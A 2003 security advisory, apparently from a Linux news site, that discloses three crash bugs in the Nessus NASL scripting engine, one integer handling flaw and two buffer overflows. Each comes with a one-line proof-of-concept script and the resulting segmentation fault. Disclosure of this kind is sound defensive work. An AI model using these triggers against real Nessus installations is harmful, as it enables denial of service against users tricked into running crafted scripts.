News Register Control Panel Private Messages Members List Team Search News Posts About Us
 

Nessus NASL scripting engine security issues
  Author: Ravish Ahuja
Added: 05/24/2003
Type: Advisory
Viewed: 227 time(s)
[ Not Rated Yet ]
Details

There exists some vulnerabilities in NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.

Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

Vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl)  insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

Overflow is triggered by very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

Overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Article Pages:   Prev | 1 | 2 | 3 | Next   


How would you rate this article:    Bad Good   Go  


Copyright Linux Advisory 2003. All rights reserved.
We are not responsible for the comment and story contributed by users.